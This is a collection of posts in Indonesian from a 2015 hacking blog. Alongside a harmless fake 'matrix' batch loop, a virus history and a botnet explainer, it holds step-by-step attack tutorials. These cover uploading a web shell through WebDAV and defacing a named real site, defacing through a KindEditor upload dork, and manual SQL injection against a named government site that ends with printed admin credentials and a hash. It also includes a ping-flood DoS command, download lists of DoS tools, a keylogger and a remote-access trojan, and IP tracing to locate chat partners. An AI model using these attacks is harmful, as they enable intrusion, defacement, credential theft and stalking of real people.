Selasa, 29 Desember 2015

Cara membuat matrix dengan Notepad

Cara membuat matrix dengan notepad

Cara membuat matrix dengan notepad

Sekarang saya akan membagikan cara membuat matrix dengan notepad, sebelum itu saya akan memberi tahu pada kalian semua "APA ITU MATRIX ?" Matrix adalah sekumpulan angka dan huruf yang berjalan dan berwarna hijau. Karna hacker identik dengan matrix, saya akan membagikan tutorial cara membuat matrix seperti di film-film hacker di luar negri :D

Caranya :
  • Pertama: Buka notepad kalian.
  • Kedua : Copy Script Berikut.
  • @echo off
    : hack
    echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
    goto hack

  • Simpan file itu dengan extensi bat, Contoh : Matrix.bat
  • Save as type : All Files
  • Encoding : ANSI
  • Klik Save
  • Jika anda ingin menjalankan matrix tersebut, buka file yang disimpan tadi, Klik Kanan pada file tersebut dan pilih Open

Cara mengetahui Real Address dan Lokasi lawan chatting facebook.

Cara mengetahui real address lawan chatting

Cara mengetahui real address lawan chatting

Artikel ini adalah lanjutan dari artikel saya yang Ini. Semoga Artikel saya bermanfaat dan dapat dibaca oleh semua pengguna internet

Lanjut saja, Caranya :
  • 1. Kita harus tahu dulu no IP yang kita cari ( contohnya : 125.162.8.77 )
  • 2. buka pake browser ke : Sini
  • 3. masukkan no IP di IP Address to locate
  • 4. Setelah no IP dimasukkan Klik Sumbit , maka akan muncul tampilan seperti di gambar, kemudian akan muncul beberapa info catat no Latitude : 3.5830 dan Longitude : 98.6670
  • 5. Buka Google Earth ( kalau belum ada ya di download/instal dulu )
  • 6. Masukkan no tadi di kotak pencarian dengan format Latitude, Longitude ( contohnya 3.5830 , 98.6670 ) . ingat pakai koma.
  • 7. Klik Fly To , atau Terbang Ke
  • 8. Nah… akan muncul peta lokasi alamat IP yang tadi
  • 9. Biar lebih detail di Google Earth sebelah kiri bawah di enable layer yang ingi dilihat ( misal nama jalan dsb ) Kalau untuk di kota kota besar terutama yang ada di eropa sono infonya akan lebih detail bahkan sampai nama gedung, nama toko, Bank dll

Perlu di ingat :

hasil yang didapat memang tidak 100% akurat tetapi minimal bisa membantu melacak daerah pengakses internet dengan IP tadi. dan menurut beberapa info dari teman ini juga merupakan salah satu cara yang dilakukan polisi untuk mengatasi kejahatan cyber.
.

jadi hati hati aja yang suka komentar, nyebar teror, ngisengin orang atau bahkan melakukan kejahatan lewat internet.
.

siap siap aja kesandung UU ITE Klik disini untuk Download Undang-Undang Informasi dan Transaksi Elektronik ( UU ITE )

Cara mengetahui Ip Address lawan chat facebook.

Cara mengetahui ip address lawan chatting facebook

Cara mengetahui ip address lawan chatting

Kali ini saya akan memberikan Tutorial singkat cara mengetahui ip address lawan chatting kita di facebook.

Langsung Saja, Caranya Pertama :


  • 1. Nyalain komputer/ laptop sobat, lalu connect ke internet pastinya.
  • 2. Matikan semua Tab Browser lalu clear cookie/ cache caranya lihat gambar y. Atau bisa juga pakai software CCleaner (googling aja, ada yang free kok).
  • 3. Buka Command Prompt melalui perintah Command >> Run >> Cmd
  • 4. Ketik "netstat -an" (tanpa tanda kutip) lalu catat IP anda yang keluar di CMD tersebut. Keempat, Ajak teman/ pacar, atau saudara yang mau sobat lacak keberadaan IP address nya melalui Chat.
  • 5. ketik "netstat -an" lagi ( akan muncul banyak IP Address pada command prompt, compare pada step Kedua dan Ketiga)
  • 6. Lihat lokasi keberadaan IP Address yang telah dilacak tsb di : Disini
  • 7. Lokasi keberadaan IP Address teman Chat FB sobat akan terlihat.
Cara Kedua :


  • 1. Ajak teman, saudara atau pacar anda untuk melakukan chatting
  • 2. Kirimkan file kepada lawan chat kita
  • 3. Masuk ke command prompt/cmd
  • 4. Ketikan Netstat -N pada command prompt / cmd tersebut lalu tekan enter
  • 5. Maka ip lawan chatting kita (Yang telah dikirimkan file) akan muncul beserta port pengirimanya
  • 6. Jika anda ingin mengetahui lokasi lawan chatting anda (real address), Tinggal kunjungi website nya :Disini

Senin, 28 Desember 2015

Software Hacking and Cracking Free Download

Beberapa Tools hacking dan cracking

Beberapa tools hacking dan cracking free download

Berikut ini kita berbagi Peralatan / Tools yang biasanya dipakai oleh pentester, hacker, cracker, phiser dan bahkan Anonymous. Hacking Tools 2014 – 2015, Cracking Tools 2014 -2015. Download Hacking Tools 2014 – 2015, Phising Tools 2014 – 2015, Hacking Tools 2014 – 2015, Tools Hacking 2014 – 2015, Cracking Tools 2014 – 2015, Tools Cracking 2014 – 2015, Tool Hack 2014 – 2015, Tool Crack 2014 – 2015, Tool Hacking 2014 – 2015, Tool Cracking 2014 – 2015, Tool Hacker 2014 – 2015, Tool Cracker 2014 – 2015, Tools Hacker 2014 – 2015, Tools Cracker 2014 – 2015 yang mungkin bisa bermanfaat untuk bisa anda pakai di 2014 – 2015.

Ayo Download Hacking Tools 2014 – 2015 – Hacker Tools 2014 – 2015 – Hack Tool 2014 – 2015 – Hacker Tool 2014 – 2015 – Hacking Tool 2014 – 2015 – Hack Tool 2014 – 2015 – Cracking Tools 2014 – 2015 – Cracker Tools 2014 – 2015 – Cracking Tool 2014 – 2015 – Cracker Tool 2014 – 2015 – Crack Tools 2014 – 2015 – Crack Tool 2014 – 2015.

First :

Acunetix v8.0.rarAcunetix v8.0.rar

Advanced Deface Creator 1.3.rar

Anonymous Attacker Package.rar

Anonymous DoSer.rar

Anonymous High Orbit Ion Cannon v1.1.rar

Ardamax Keylogger v4.2.Pro + Key.rar

BBHH-Ultra DoS.rar

BK Release Smart Hunter V1.4.3.rar

BamBam.rar

BanglaDos-Bangladesh DoS Attack Engine.rar

ByteDOS v3.2 (1).rar

ByteDOS v3.2.rar

DUCSetup_v4_1_0.rar

Deface Page Created Version 1.2.rar

Deface Page Creator v1.3.rar

ExploitScanner.rar

FileZillaPortable_3.3.5.1.paf.rar

FreePortScanner.rar

Second :

Good-Bye-v5.2.rar

Havij 1.15.rar

Horny Monkey.rar

MD5.rar

MIRC 7.19 Full.rar

ProDoS v1.0 ‘by [LM]JuStIcEiRo’.rar

ProDoS v1.1.rar

SQLHelper.rar

ServerDeath.rar

ShellChecker.rar

Shockwave Booter v2.0.rar

Shockwave Booter.rar

SlowLoris (1).rar

Social Media Hack tools 2015.rar

Sql Poison v1.0-The Exploit Scanner.rar

Sqli Dumper 5.1 Pro.rar

Unknown DoSer.rar

WebCruiserWVS.rar

Sumber: http://www.binushacker.net/download-hacking-cracking-software.html

Cara Deface dengan webdav

Cara deface web dengan webdav

Cara deface website dengan webdav

Kali ini saya akan memberi tutorial cara deface dengan webdav rootikit.

Cara :

Pertama Kalian Download dulu webdav rootkit :

Downloadwebdav

Dork :
intitle:"Directory Listing For /"
inurl:webdav tomcat
intitle:"Directory Listing For /"
inurl:webdav
inurl:*.edu/*.asp
inurl:.gov.*/*.asp
inurl:*.gov/*.asp
inurl:.org/*.asp
inurl:.ag/*.asp
inurl:.it/*.asp
inurl:.uk/*.asp
inurl:.co.il/*.asp
inurl:.com/*.asp
inurl:.co.id/*.asp
inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp


Setelah didownload kalian matikan dulu antivirus komputer kalian (agar webdav tersebut bisa dibuka), selanjutnya tinggal kalian buka webdav rootkit tersebut.

Jika webdav tersebut sudah terbuka, Klik tulisan "Webdav" kemudian klik "Asp shell maker"

Setelah klik " Asp shell maker " anda akan melihat Program Webdav Shell Maker , jika sudah ada program Webdav Shell Maker anda klik tulisan " Setting ( untuk mengedit file / shell anda ) "

Setelah klik tulisan "Setting" edit tulisan /Hmei7.asp;.txt dengan tulisan anda contohnya ( /bLacK_.asp;.txt sebenarnya tidak usah diedit juga tidak masalah ) setelah kalian edit tulisannya tinggal masukan target web / site korban . Caranya tinggal klik " Add Site " lalu masukan site korban ( contoh : http://www.odelagrange.com/ ) Jika sudah dimasukan web korban tinggal klik "Serang" ( tunggu sampai ada notice )

Checking : http://odelagrange.com Shell Created !! http://odelagrange.com/bLacK_.asp;.txt

Jika sudah muncul tulisannya tinggal copy hasil defacenya ( contoh : http://odelagrange.com/bLacK_.asp;.txt ) lanjut ke step berikutnya . Jika sudah dicopy tinggal paste di address bar anda ( Mozila , Google Chrome , IE , Opera Mini , dll ) lalu tekan enter .

Lalu setelah itu anda akan dialihkan ke situs http://odelagrange.com/bLacK_.asp;.txt dan saatnya anda untuk beraksi . Anda cari tulisan ( index.asp / index.html / index.htm / index.php / yang berhubungan dengan index gunakan ctrl+f supaya lebih mudah mencari ) pada contoh web http://odelagrange.com/bLacK_.asp;.txt ada tulisan " index.html " .

Selanjutnya anda tinggal mengedit (klik gambar tanda seru untuk mengedit , jangan klik selain gambar itu ) data yang ada didalam file " index.html " dengan file / script deface anda ( jika belum punya silahkan Disini ) lalu klik " Kaydet / Save " .

Jika data berhasil diedit maka ada tulisan " File Edited Successful:) " .


Selamat anda telah berhasil mendeface website http://odelagrange.com Jika sudah success tinggal anda edit link / site target ( contoh : http://odelagrange.com/index.html biasanya jika /index.html dll bisa kena index dari web tersebut ) kemudian tekan enter di address bar anda . Jika halaman dari http://odelagrange.com/index.html berhasil maka akan ada script anda di web itu . Jika anda ingin mencoba mengetahui apakah anda berhasil mendeface INDEX dari web tersebut caranya tinggal hapus saja tulisan /index.html ( contoh http://odelagrange.com/index.html -> http://odelagrange.com/ ).

Cara melakukan ddos attack dengan cmd

Cara melakukan serangan ddos dengan cmd

Cara melakukan ddos attack dengan cmd

Jika anda belum tahu apa itu ddos Kunjungi : http://indonesiacybercomunity.blogspot.co.id/2015/12/apa-itu-ddos-attack.html

Cara Pertama :

ketikan command berikut pada cmd :

1. Buka CMD

2. ketik "ping (ip add) -l 50000 -n 5000 -w 0.00001"

  • (ip add) = IP Address situs yang akan di DDoS (bisa diganti dengan alamat situsnya)
  • -l 50000 = besar ping yang dikirim server sebesar 50000 bytes (bisa diganti maksimal 65500 bytes)
  • -n 5000 = ukuran buffer yang dikirim 5000 bytes (bisa diganti sesuka hati)
  • -w 0.00001 = waktu tunggu tiap ping 0.00001 milidetik (bisa diganti sesuka hati)
3. Tekan enter dan tunggu hingga anda mendapatkan pesan "Request timed out"

Jika anda ingin tahu cara membuat hack tools ddos sendiri kunjungi : http://indonesiacybercomunity.blogspot.co.id/2015/12/membuat-hack-tools-ddos-attack-dengan.html
Jika anda ingin mendapatkan tools ddos para hacker kunjungi : http://indonesiacybercomunity.blogspot.co.id/2015/12/tools-ddos-dan-linknya.html

Deface dengan kingeditor

Deface dengan kingeditor

Deface dengan kingeditor

Kali ini saya akan memberi sedikit ilmu, yaitu deface dengan kingeditor. mungkin bagi para master, deface dengan kingeditor memang tidak ada skillnya tapi bagi para newbie ini cukup untuk mengisi pengalaman mereka dalam duni hacking.

Cara deface dengan king editor :

1. Pergi ke Mbah Google

cari target dengan dork berikut :

inurl:examples/uploadbutton.html

3. Pilih salah satu web target anda :

4. Klik upload dan pilih script deface , kalau tidak punya script deface silahkan gunakan script deface saya : Disini

5. Setelah itu klik upload , jika berhasil akan muncul path file location anda di kolom upload seperti ini : NB: Jika upload tidak berhasil silahkan cari target yang lain

6. Copy path file location anda dan pastekan setelah nama domain web tersebut seperti gambar diatas dan klik enter

7. Sebagai contoh ini adalah target saya : http://www.12349.cc/

Maka ini adalah path file location saya

: /uploads/file/20151221/20151221092951_50102.html

Ini Hasil web yang saya deface :

http://www.12349.cc/uploads/file/20151221/20151221092951_50102.html

Cara SQL Injection Manual

Cara SqlInjection Manual

Pengertian SqlInjection :

SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :

Contoh:

http://situstarget.com/news.php?id=1’
http://situstarget.com/news.php?id=’1



Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.

Dork Sqli :

inurl:azerty.php?id= ,

inurl:bouquin.php?id= ,

inurl:lien.php?id= ,

inurl:clavier.php?id=

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=



Disini saya mendapatkan target :http://diklat.lampungprov.go.id/more.php?id=1

Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error



http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error



Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.

Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version". contoh: http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--



Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.

Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --. contoh : http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--



Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya Disini kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--



Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--



Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data : user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya Disini Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja, jebreet jebreet jebreet :D

Sejarah Virus Komputer

Sejarah Virus Komputer

Kali ini saya akan memberi informasi tentang sejarah virus komputer yang mungkin semua orang belum mengetahuinya. Semoga artikel saya bermanfaat dan dapat dilihat oleh semua orang.

Menilik dari sisi software, virus komputer adalah musuh terbesar bagi pengguna komputer. Hingga saat ini, jumlah virus komputer yang diketahui telah mencapai puluhan juta varian. Pertanyaannya, bagaimanakan virus komputer ini bisa ada?

Sejarah virus komputer bermula pada tahun 1949 oleh John von Neuman yang memprakarsai komputer digital modern yang membuat sebuah program yang dapat menduplikasi file. Namun virus komputer pertama yang benar-benar menglobal baru dikenal pada tahun 1986 dengan nama Brain. Virus pertama ini diciptakan oleh 2 orang bersaudara asal Pakistan, yaitu Basit dan Amjad.

Virus berukuran 360kb ini dimasukkan dalam boot sector melalui disket komputer serta menduplikasi penggunaan memori komputer. Penyebaran virus mulai meluas hingga ke beberapa universitas di Amerika. Pada tahun yang sama, seorang programmer dan penulis di bidang keamanan komputer Ralf Burger menyatakan dalam tulisannya, bahwa proses penduplikasian file dapat dilakukan dengan hanya menyertakan perintah-perintah sederhana yang dapat bekerja secara otomatis dari balik layar. Oleh Ralf sendiri, script ini dinamakan dengan VIRDEM.

Sejarah Virus Komputer

Sejarah virus komputer mulai berkembang saat itu, terutama setelah munculnya virus-virus generasi pertama yang sangat merajalela pada masa itu, sebut saja seperti Stoned, Cascade, Jerusalem dan Denzuka (buatan Indonesia).

Varian dan cara kerja virus semakin beragam dan berbahaya pada tahun 1989-1990, mulai dari cara kerja virus yang hanya sebatas menduplikasi file, kemudian muncul ratusan jenis varian virus lainnya yang diperkirakan mencapai lebih dari 400 macam. Beberapa virus komputer yang berbahaya, sebut saja seperti Datacrime yang dapat memformat isi harddisk, lalu ada polymorphic, virus buatan Mark Washburn yang dibuat dengan lebih rapi lagi karena kerja virus menjadi sulit terdeteksi. Bahkan antivirus pun memerlukan waktu dua tahun untuk memahami cara kerja virus ini.

Sejarah virus komputer semakin tak terbendung, setelah kemunculan virus Dark Avenger dari Bulgaria yang dapat turut menyebarkan script bahasa pemrogramannya kepada pengguna komputer sehingga setiap orang dapat membuat virus ini secara bebas.

Sejarah Virus Komputer Pertama

Virus komputer dibuat menggunakan script bahasa pemrograman yang dijalankan dengan tujuan merubah script pemrograman yang ada di sistem komputer sehingga fungsi yang ada menjadi abnormal atau berjalan dengan tidak semestinya. Oleh karena itu, para programmer berusaha membuat script lainnya untuk menetralisir script yang telah diubah tersebut. Dan hal inilah yang menjadi cikal bakal lahirnya Antivirus komputer.

Dengan dukungan dana yang lebih besar, akhirnya muncullah perusahaan peneliti antivirus lainnya seperti SYMANTEC (Norton Antivirus), CENTRAL POIN (CPAV), Microsoft Antivirus dan segelintir lainnya. Pada pertengahan tahun 1991 adalah masa dimana perang antivirus dengan virus dimulai.

Pada awal kemunculannya, kendati sudah memiliki software proteksi antivirus, namun kerja antivirus tidaklah terlalu maksimal. Mereka masih harus bekerja keras dalam mendeteksi dan membasmi virus komputer, terutama virus yang cukup tangguh. Sebut saja seperti Tequila yang mampu mengelabui antivirus. Peneliti antivirus perlu bekerja hampir setengah tahun untuk bisa mengerti cara kerja virus ini.

Saat ini, perkembangan teknologi antivirus sudah semakin canggih. Sebuah program antivirus sudah mampu mendeteksi keberadaan virus baru di komputer hanya dalam waktu setengah jam saja, dan beberapa jam tambahan untuk mengupload sampel virus hingga dapat dikenali informasi virus apakah itu.

Apa Itu Botnet ?

Apa itu botnet ?
Istilah Botnet seharusnya sudah bukan hal yang asing lagi bagi kalian pengguna internet. Sebab Botnet adalah penyakit serius yang menjangkiti internet sejak awal kemunculannya. Namun menurut saya, Masih banyak netter yang belum mengetahui mengenai ancaman serangan Botnet. Melalui artikel ini, saya ingin membantu menyebarkan awareness publik mengenai bahaya Botnet. Semoga bermanfaat.

Apa itu botnet ?

Botnet, atau Robot Network, atau Pasukan Zombie, adalah idiom untuk sekelompok komputer yang telah diinfeksi oleh software-software jahat (malware). atau botnet merupakan kegiatan menyusupkan program-program tertentu kepada server-server komputer dimana program-program tersebut biasanya disusupkan sebagai worms, Trojan horse, atau backdoors, di bawah perintah Master Refer dan dikendalikan dengan sebuah remote. Kemudian malware yang disusupkan pada komputer tersebut bertugas untuk mencuri data-data penting (login, informasi credit card dan sebagainya), kemudian menginfeksi komputer lain.

Jika komputer yang diinfeksi adalah komputer seorang webmaster, maka malware bisa juga menyusup ke server website ketika webmaster sedang mengupload file-file website. Website yang tanpa disadari telah disusupi malware, dapat dipakai untuk berbagai tujuan yang jahat. Di antaranya: sebagai media penyebaran malware ke komputer-komputer visitor, pencurian password (scam), mass-email ke ratusan ribu alamat (spam), mencuri data website anda (theft), penipuan pay-per-click (abuse) dan membuat IP server anda diblacklist oleh berbagai layanan.

Program-program botnet tersebut menyebar ketika IRC “bots”. Diperintahkan dan kendali berlangsung via satu server IRC atau suatu saluran yang spesifik di suatu jaringan publik. Suatu bot pada umumnya tersembunyi, dan mematuhi perintah dari RFC 1459 (IRC) sebagai patokan. Secara umum, botnet menyebar kepada berbagai infrastrukktur jaringan server komputer, Bots lebih baru dapat secara otomatis meneliti lingkungan mereka dan menyebarkan diri mereka menggunakan sifat mudah kena luka dan kata sandi yang lemah. Secara umum, semakin banyak kerentanan suatu software suatu bot dapat dengan mudah menyebar. Proses tentang pencurian sumber daya komputasi sebagai hasil suatu sistim pada “botnet” kadang-kadang dikenal sebagai “scrumping”.

Botnets sudah menjadi suatu bagian penting dari keamanan jaringan Internet,karena sifatnya yang tersembunyi pada jaringan server internet. Sering kali, suatu botnet akan masuk di dalam bermacam koneksi-koneksi, seperti telepon, ADSL dan kabel(telegram, dan bermacam jaringan, termasuk bidang pendidikan, [perseroan/perusahaan], pemerintah dan bahkan jaringan militer. Kadang-kadang menyembunyikan satu instalasi server IRC di satu bidang pendidikan atau lokasi [perseroan/perusahaan], di mana koneksi-koneksi yang kecepatan tinggi dapat mendukung sejumlah besar bots yang lain.

Beberapa botnets telah ditemukan dan yang dipindahkan dari Internet. Belanda metemukan 15 juta simpul botnet dan Orang Norwegia ISP Telenor menemukan 10,000-node botnet . Usaha-usaha besar untuk mengkoordinir secara internasional menutup botnets telah pula dilakukan. diperkirakan bahwa sampai seperempat jumlah dari semua komputer pribadi yang tersambungkan ke internet itu boleh menjadi bagian dari suatu botnet. Laporan ENISA (European Network and Information Security Agency), Botnet diam diam mengancam hampir 6 juta komputer yang terhubung ke internet yang disinyalir sudah terinfeksi. Botnet sebenarnya buka masalah,tetapi menjadi berbahaya seandainya dibelakang nya ada sindikat criminal. Misalnya program botnet masuk ke komputer tanpa diketahui oleh pemiliknya, lalu mengendalikan komputer yang telah terinfeksi tersebut untuk kejahatan internet seperti mencuri data pribadi,mengirim email, penipuan via email atau serangan masal seperti spamming.

Apalagi kita tidak mengetahui dimana si Master refer berada sehingga menyulitkan untuk mencari siapa yang mengirim program botnet tersebut. Dimana sebagian Negara besar seperti China, Amerika, Jerman, Spanyol dan perancis sudah menjadi korban botnet yang umumnya botnet menggunakan kelemahan dari browser misalnya dari internet explorer. Kelemahan ini dimanfaatkan oleh pengirim botnet untuk menginfeksi dan 60 % kejadian biasanya berasal dari pengguna yang mencoba mengklik sebuah link di internet sehingga komputer langsung terinfeksi. Sedangkan cara lain malah lebih kecil seperti file dalam attachment email hanya 13 %, kelemahan system operasi 11%, dan terakhir mendownload file internet 9 %.

Mengetahui sebuah komputer telah disusupi program botnet biasanya komputer menjadi lambat lalu perubahan tampilan browser seperti alamat, home page yang berubah, anti virus tidak aktif dan program yang suka me restart sendiri. Untuk menghadapi botnet usahakan jangan mengklik sembarangan yang tidak dikenal karena bisa saja link tersebut malah mengarahkan user internet untuk mendownload program botnet.


TYPICAL BOT LIFECYCLE

Terlepas dari topologi yang digunakan, model bot lifecycle adalah sebagai berikut:
  • Creation: Botmaster akan mengembangkan software bot-nya dengan cara memperbaiki kode yang sudah ada atau menambahkan beberapa fitur di dalam botnya.
  • Infection: Ada beberapa cara kemungkinan yang dilakukan oleh bot dalam menginfeksi komputer yang menjadi korbannya, contohnya: software vulnerabilitas, Drive-by download, Trojan horse, email attachment,dan lain-lain.
  • Rallying: Setelah bot mengambil alih hak komputer korban, bot akan mengumpulkan informasi-informasi yang dibutuhkan yang akan dilaporkan pada botmaster.
  • Waiting: Sambil mengumpulkan informasi, bot akan menunggu perintah yang berasal dari botmaster melalui C&C Server.
  • Executing: Apabila botmaster telah mendapatkan informasi yang dibutuhkan maka melalui Server C&C, botmaster akan memberikan perintah kepada bot untuk melakukan aktifitas kejahatan seperti DDoS, sending spam, dan sebagainya.

Sejarah Botnet

Sebelum Botnet muncul, virus dan worm merupakan salah satu ancaman yang berbahaya bagi dunia internet. Dimana attacker dapat menggunakan worm dan virus untuk mengontrol/menginfeksi komputer dari jarak jauh. Namun, apabila komputer yang telah diambil alih oleh attacker dilakukan sebuah pembersihan dan protection maka attacker tidak bisa lagi mengontrol komputer tersebut. Contohnya : Melissa email worm (1999), ILOVEYOU (2000), Code Red (2001), Slammer (2003), dan Sasser (2004).

Konsep bot dalam me-remote komputer awalnya muncul dari Internet Relay Chat (IRC). Dimana pada mulanya bot di buat untuk membantu administrator dalam mengendalikan channel-channel yang terdapat pada IRC. Salah satu contoh implementasi bot pada IRC adalah “eggdrop”. Eggdrop dikembangkan pada tahun 1993 dan merupakan IRC bot yang paling popular. Seiring dengan waktu, attacker mulai menyadari bahwa bot tersebut dapat digunakan untuk hal-hal yang bersifat kejahatan karena dapat dikontrol dan dikendalikan melalui sebuah server yang disebut C&C Server. Akibat dari prinsip itulah maka lahirlah jenis-jenis botnet yang lain yang lebih powerfull dari eggdrop.

Common Case

Ketika sedang berselancar di Internet, mungkin anda sesekali pernah menjumpai tampilan seperti ini:


Atau Seperti Ini :

Artinya website yang tengah anda kunjungi telah diblokir oleh Google sebab terindikasi ditemukan malware di dalamnya.

Jika anda webmaster dari website tersebut, apa yang harus dilakukan?

Pertama, carilah malware-malware yang sedang bersembunyi pada website anda. Malware bisa jadi menyusup ke dalam script-script website anda, atau menyamar menjadi file-file lain, dsb. Meskipun kurang akurat, Google Webmaster Tool dapat membantu melakukan tracking malware. Daftarkan saja akun anda pada https://www.google.com/webmasters

Kemudian, jika sudah bersih, submit request reconsideration pada Google melalui form ticket pada URL berikut: https://www.google.com/webmasters/tools/reconsideration. Sayangnya Google kurang bertanggungjawab dalam hal ini. Kadang setelah tiket disubmit, anda harus menunggu 1 hari – 1 minggu – 1 bulan agar website anda direconsider lagi.

kemudian saya juga menyarankan anda untuk melindungi komputer anda terhadap virus paling dikenal, sehingga anda mungkin dapat mendeteksi dan menghapus virus sebelum dapat melakukan kerusakan apapun (lihat Memahami Anti-Virus Software untuk informasi lebih lanjut ). Karena penyerang terus menulis virus baru, penting untuk menjaga definisi anda up to date. Beberapa vendor anti-virus juga menawarkan software anti-rootkit.

lalu Instal firewall - Firewall mungkin dapat mencegah beberapa jenis infeksi oleh memblokir lalu lintas berbahaya sebelum dapat memasuki komputer anda dan membatasi lalu lintas yang anda kirim (lihat Memahami Firewall untuk informasi lebih lanjut). Beberapa sistem operasi benar-benar termasuk firewall, tetapi Anda harus memastikan diaktifkan.

Gunakan password yang baik - Pilih password yang akan sulit bagi penyerang untuk menebak, dan menggunakan password yang berbeda untuk program dan perangkat yang berbeda (lihat Memilih dan Melindungi Sandi untuk informasi lebih lanjut). Jangan memilih opsi yang memungkinkan komputer untuk mengingat password anda.

Oleh sebab itu maka berhati-hatilah terhadap malware. Bisa jadi saat ini website atau komputer pengunjung website kita telah dikonversi menjadi sepasukan zombie. Spread awareness tentang Botnet kepada sesama pemilik website di samping kita.

Tools Botnet

  1. Poison Ivy (Botnet Command Control Center)
  2. Poison Ivy adalah tool untuk meremote komputer, dengan prinsip koneksi terbalik.Poison Ivy juga terdiri dari program client dan server, dimana program server bisa dikonfigurasi sesuai keinginan hacker.



    Server Poison Ivy dibuat dengan bahasa assembly sementara program clientnya dibuat dengan bahasa delphi. Poison Ivy hanya berjalan di Windows dan tidak mempunyai dependensi dengan program atau servis lain di Windows sehingga sangat mudah dijalankan.

    Jika anda ingin mendownload tools tersebut : Disini

Sekilas Tentang DnsSpoofing.

Sekilas Tentang DnsSpoofing

Kali ini saya akan memberi sedikit pengetahuan tentang dns spoofing, semoga artikel saya bermanfaat dan dapat dibaca oleh semua orang.

Sekilas Tentang DnsSpoofing

